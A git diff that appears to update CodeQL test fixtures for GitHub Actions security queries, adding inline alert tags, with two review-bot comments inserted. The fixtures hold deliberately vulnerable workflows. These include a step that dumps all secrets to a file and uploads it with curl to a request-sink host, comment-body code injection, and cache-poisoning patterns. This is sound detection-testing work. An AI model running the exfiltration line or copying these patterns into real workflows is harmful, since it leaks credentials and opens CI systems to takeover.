diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml index f000ad6a287..2ee5623b64c 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml @@ -6,5 +6,5 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml index 6530bd5f08e..a26e39cbda0 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/ai-inference + - uses: actions/ai-inference # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml index 6f7844f17cb..4db5fc75523 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - test: + test: # $ Alert name: Build and test runs-on: ubuntu-latest permissions: {} diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml index 4353c280497..c5448530fbb 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml 
@@ -7,6 +7,6 @@ jobs:
 name: Build and test
 runs-on: ubuntu-latest
 steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v2 # $ Alert
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml
index 2824ca14a7e..ae9514f93e6 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml
@@ -8,6 +8,6 @@ jobs:
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v2
- - uses: actions/jekyll-build-pages
+ - uses: actions/jekyll-build-pages # $ Alert
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml
index 0ec255f0d10..85434ad0346 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml
@@ -7,4 +7,4 @@ jobs:
 name: Build and test
 runs-on: ubuntu-latest
 steps:
- - uses: actions/add-to-project@v2
+ - uses: actions/add-to-project@v2 # $ Alert
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml
index 1a10bd6a7d6..137fa791353 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml
@@ -7,4 +7,4 @@ jobs:
 name: Build and test
 runs-on: ubuntu-latest
 steps:
- - uses: actions/deploy-pages
+ - uses: actions/deploy-pages # $ Alert
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml
index b6ae16bf9e2..8981c866382 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml
@@ -7,4 +7,4 @@ jobs:
 name: Build and test
 runs-on: ubuntu-latest
 steps:
- - uses: actions/delete-package-versions
+ - uses: actions/delete-package-versions # $ Alert
diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
index ad1c6a99660..6837eb5124c 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
@@ -1,2 +1,2 @@
-Security/CWE-275/MissingActionsPermissions.ql
-
+query: Security/CWE-275/MissingActionsPermissions.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml
index 37eb2bddb58..24ad2ff91c8 100644
--- a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml
@@ -8,13 +8,13 @@ jobs:
 runs-on: [self-hosted, X64, Linux, 16c32g]
 steps:
 - run: cmd
- test2:
+ test2: # $ Alert
 runs-on:
 group: my-group
 labels: [self-hosted, label-1]
 steps:
 - run: cmd
- test3:
+ test3: # $ Alert
 runs-on:
 - 'self-hosted'
 - 'linux'
@@ -22,11 +22,11 @@ jobs:
 - 'metal'
 steps:
 - run: echo "foo"
- test4:
+ test4: # $ Alert
 runs-on: self-hosted-azure
 steps:
 - run: cmd
- test5:
+ test5: # $ Alert
 strategy:
 fail-fast: false
 matrix:
@@ -63,7 +63,7 @@ jobs:
 runs-on: ${{ matrix.os }}
 steps:
 - run: cmd
- test8:
+ test8: # $ Alert
 strategy:
 matrix:
 settings:
@@ -75,14 +75,14 @@ jobs:
 runs-on: ${{ matrix.settings.host }}
 steps:
 - run: cmd
- test9:
+ test9: # $ Alert
 strategy:
 matrix:
 os: ${{ github.repository }}
 runs-on: ${{ matrix.os }}
 steps:
 - run: cmd
- test10:
+ test10: # $ Alert
 strategy:
 matrix:
 os: ${{ github.repository }}
@@ -91,4 +91,4 @@ jobs:
 baz: "asdf"
 runs-on: ${{ matrix.foo.bar }}
 steps:
- - run: cmd
+ - run: cmd # $ Alert
diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
index dc99068b303..3c21812c0e7 100644
--- a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
@@ -1,2 +1,2 @@
-experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
-
+query: experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
index 48833460b44..4c8aa982c31 100644
--- a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
@@ -17,4 +17,4 @@ jobs:
 if: contains(github.event.pull_request.labels.*.name, 'safe to test')
 with:
 ref: ${{ github.event.pull_request.head.ref }}
- - run: ./cmd
+ - run: ./cmd # $ Alert
diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
index 09a19f21e3c..c62fedc2e7d 100644
--- a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
@@ -1,2 +1,2 @@
-Security/CWE-285/ImproperAccessControl.ql
-
+query: Security/CWE-285/ImproperAccessControl.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
index 473d5998695..4d09af11cfd 100644
--- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
+++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
@@ -11,7 +11,7 @@ jobs:
 with:
 name: file
 path: .
- test2: # NOT VULNERABLE
+ test2: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts]
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
@@ -29,7 +29,7 @@ jobs:
 with:
 name: file
 path: "*"
- test4: # VULNERABLE
+ test4: # VULNERABLE # $ Alert[actions/secrets-in-artifacts]
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
@@ -40,7 +40,7 @@ jobs:
 with:
 name: file
 path: foo
- test5: # VULNERABLE
+ test5: # VULNERABLE # $ Alert[actions/secrets-in-artifacts]
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
@@ -51,7 +51,7 @@ jobs:
 with:
 name: file
 path: foo/*
- test6: # NOT VULNERABLE
+ test6: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts]
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
@@ -83,5 +83,5 @@ jobs:
 uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
 with:
 name: file
- path: .
+ path: . # $ Alert[actions/secrets-in-artifacts]
diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
index 614efab34c9..d476fab3ce4 100644
--- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
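Review bot: In the `test2` and `test6` hunks of secrets-in-artifacts.yml the new tag `# $ Alert[actions/secrets-in-artifacts]` is placed on a line whose existing comment says `# NOT VULNERABLE`, so the expectation now pins a result that the fixture itself describes as a false positive. If keeping that result is intentional, the inline-expectations framework's `SPURIOUS:` prefix (`test2: # NOT VULNERABLE # $ SPURIOUS: Alert[actions/secrets-in-artifacts]`) records that the alert is unwanted while still matching the query's output; if the query is right and the comment is stale, the comment should be removed instead. The `test4` and `test5` hunks agree with their `# VULNERABLE` comments and need no change. Each job's body continues outside its hunk.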
@@ -9,17 +9,17 @@ jobs:
 TOKENS: [WRITE, READ]
 steps:
 - run: |
- echo '${{ toJSON(secrets) }}' > secrets.txt
+ echo '${{ toJSON(secrets) }}' > secrets.txt # $ Alert[actions/excessive-secrets-exposure]
 curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com
 - env:
- ALL_SECRETS: ${{ toJSON(secrets) }}
+ ALL_SECRETS: ${{ toJSON(secrets) }} # $ Alert[actions/excessive-secrets-exposure]
 run: echo "$ALL_SECRETS"
 - env:
- SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }}
+ SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} # $ Alert[actions/excessive-secrets-exposure]
 run: echo "$SOME_SECRETS"
 - env:
- username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }}
- password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }}
+ username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} # $ Alert[actions/unmasked-secret-exposure]
+ password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} # $ Alert[actions/unmasked-secret-exposure]
 run: |
 echo "$username"
 echo "$password"
diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
index 45f5ad80fd9..2341eea4546 100644
--- a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
@@ -1,2 +1,2 @@
-Security/CWE-312/ExcessiveSecretsExposure.ql
-
+query: Security/CWE-312/ExcessiveSecretsExposure.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
index c9bb538a12d..ea9ad38301f 100644
--- a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
@@ -1,2 +1,2 @@
-Security/CWE-312/SecretsInArtifacts.ql
-
+query: Security/CWE-312/SecretsInArtifacts.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
index ad4c8461523..be8a489a18b 100644
--- a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
@@ -1,2 +1,2 @@
-Security/CWE-312/UnmaskedSecretExposure.ql
-
+query: Security/CWE-312/UnmaskedSecretExposure.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
index 9f19634abc9..ffd8410a1a8 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
@@ -8,5 +8,5 @@ jobs:
 runs-on: ubuntu-latest
 steps:
 - run: |
- echo ${{ github.event.comment.body }}
+ echo ${{ github.event.comment.body }} # $ Alert[actions/cache-poisoning/code-injection]
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml
index 55efe8e9fec..7d6556c97c0 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml
@@ -15,9 +15,9 @@ jobs:
 with:
 ref: ${{ steps.comment-branch.outputs.head_sha }}
- - uses: actions/cache@v2
+ - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache]
 with:
 path: ./poison
 key: poison_key
- - run: |
+ - run: | # $ Alert[actions/cache-poisoning/direct-cache]
 cat poison
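Review bot: In the direct_cache1.yml hunk the new `# $ Alert[actions/cache-poisoning/direct-cache]` tag is attached to the `- run: |` step, while the result the .expected file reports is the `actions/cache@v2` Uses Step at 18:9:22:6, whose end position falls on the first line of the following step; presumably the postprocess query matches tags by end line, which is why the fixture now reads as if the `run` step were the alert. The same offset appears in direct_cache2 through direct_cache5, and in poisonable_step1 where the Alert lands on the `pr-comment2:` and `pr-comment3:` job keys rather than on the flagged steps. A header comment in these fixtures such as `# Inline expectation tags sit on the end line of the flagged element, which for YAML steps is usually the first line of the next step or job` would keep the next reader from concluding that the wrong step is reported. The job containing this hunk starts outside it.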
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml
index eb6373a406e..a6413290212 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml
@@ -11,9 +11,9 @@ jobs:
 - uses: actions/checkout@v3
 with:
 ref: ${{ github.event.pull_request.head.sha }}
- - uses: actions/cache@v2
+ - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache]
 with:
 path: ./poison
 key: poison_key
- - run: |
+ - run: | # $ Alert[actions/cache-poisoning/direct-cache]
 cat poison
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml
index 3849d92cbcc..85a8d067f60 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml
@@ -16,9 +16,9 @@ jobs:
 with:
 ref: ${{ steps.comment-branch.outputs.head_sha }}
- - uses: actions/cache@v2
+ - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache]
 with:
 path: ./poison
 key: poison_key
- - run: |
+ - run: | # $ Alert[actions/cache-poisoning/direct-cache]
 cat poison
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml
index d3f51456de2..896c22d9243 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml
@@ -14,9 +14,9 @@ jobs:
 - uses: actions/checkout@v3
 with:
 ref: ${{ github.event.pull_request.head.sha }}
- - uses: actions/cache@v2
+ - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache]
 with:
 path: ./poison
 key: poison_key
- - run: |
+ - run: | # $ Alert[actions/cache-poisoning/direct-cache]
 cat poison
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml
index ec0f9b0e6c9..1faedcf1b91 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml
@@ -14,9 +14,9 @@ jobs:
 - uses: actions/checkout@v3
 with:
 ref: ${{ github.event.pull_request.head.sha }}
- - uses: actions/cache@v2
+ - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache]
 with:
 path: ./poison
 key: poison_key
- - run: |
+ - run: | # $ Alert[actions/cache-poisoning/direct-cache]
 cat poison
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
index b9652d46b59..a17b62dbaff 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
@@ -13,7 +13,7 @@ jobs:
 - uses: actions/checkout@v4
 with:
 ref: ${{ github.event.pull_request.head.sha }}
- - name: Set up Python 3.10
+ - name: Set up Python 3.10 # $ Source[actions/cache-poisoning/direct-cache]
 uses: actions/setup-python@v5
 with:
 python-version: "3.10"
@@ -23,4 +23,4 @@ jobs:
 with:
 path: ./results/pip
 key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
- restore-keys: ${{ runner.os }}-pip-
+ restore-keys: ${{ runner.os }}-pip- # $ Alert[actions/cache-poisoning/direct-cache]
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml
index 05f8e4a067a..d99592c830f 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml
@@ -12,9 +12,9 @@ jobs:
 - uses: actions/checkout@v3
 with:
 ref: ${{ steps.comment-branch.outputs.head_sha }}
- - run: ./checkedout/poison
+ - run: ./checkedout/poison # $ Source[actions/cache-poisoning/poisonable-step]
- pr-comment2:
+ pr-comment2: # $ Alert[actions/cache-poisoning/poisonable-step]
 runs-on: ubuntu-latest
 permissions: read-all
 steps:
@@ -23,9 +23,9 @@ jobs:
 - uses: actions/checkout@v3
 with:
 ref: ${{ steps.comment-branch.outputs.head_sha }}
- - uses: ./.github/actions/node-npm-setup
+ - uses: ./.github/actions/node-npm-setup # $ Source[actions/cache-poisoning/poisonable-step]
- pr-comment3:
+ pr-comment3: # $ Alert[actions/cache-poisoning/poisonable-step]
 runs-on: ubuntu-latest
 permissions: read-all
 steps:
@@ -34,4 +34,4 @@ jobs:
 - uses: actions/checkout@v3
 with:
 ref: ${{ steps.comment-branch.outputs.head_sha }}
- - run: node .github/actions-scripts/what-docs-early-access-branch.js
+ - run: node .github/actions-scripts/what-docs-early-access-branch.js # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step]
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml
index 60ba26406c6..60be3c02edb 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml
@@ -17,11 +17,11 @@ jobs:
 with:
 ref: ${{ github.event.pull_request.head.ref }}
 repository: ${{ github.event.pull_request.head.repo.full_name }}
- - name: Setup Pages
+ - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step]
 uses: actions/configure-pages@v5
 - name: Build with Jekyll
 uses: actions/jekyll-build-pages@v1
 with:
 source: ./
- destination: ./_site
+ destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step]
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
index 8539bf2bda4..7ceb82a536f 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
@@ -16,4 +16,4 @@ jobs:
 ref: ${{ github.event.pull_request.head.ref }}
 repository: ${{ github.event.pull_request.head.repo.full_name }}
- - run: npm run build -w www
+ - run: npm run build -w www # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step]
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
index 6e2351c1744..33d28c1f292 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
@@ -15,4 +15,4 @@ jobs:
 with:
 ref: ${{ github.event.pull_request.head.sha }}
 repository: ${{ github.event.pull_request.head.repo.full_name }}
- - run: ./foo
+ - run: ./foo # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step]
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
index 9742bd01a48..082585088b1 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
+++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
@@ -19,10 +19,10 @@ jobs:
 with:
 ref: ${{ github.event.pull_request.head.ref }}
 repository: ${{ github.event.pull_request.head.repo.full_name }}
- - name: Setup Pages
+ - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step]
 uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5
 - name: Build with Jekyll
 uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1
 with:
 source: ./
- destination: ./_site
+ destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step]
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
index 9cfac091f67..be669230722 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
@@ -1,3 +1,5 @@
+#select
+| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment |
 edges
 | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | |
 nodes
@@ -6,5 +8,3 @@ nodes
 | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified |
 | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body |
 subpaths
-#select
-| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment |
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
index 8ac48aad93e..62a04c8718c 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
@@ -1,2 +1,2 @@
-Security/CWE-349/CachePoisoningViaCodeInjection.ql
-
+query: Security/CWE-349/CachePoisoningViaCodeInjection.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected
index 4cc8536b594..4014714be4b 100644
--- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected
+++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected
@@ -1,3 +1,10 @@
+#select
+| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target |
+| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment |
+| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@).
| .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target |
 edges
 | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step |
 | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step |
@@ -43,10 +50,3 @@ edges
 | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step |
 | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step |
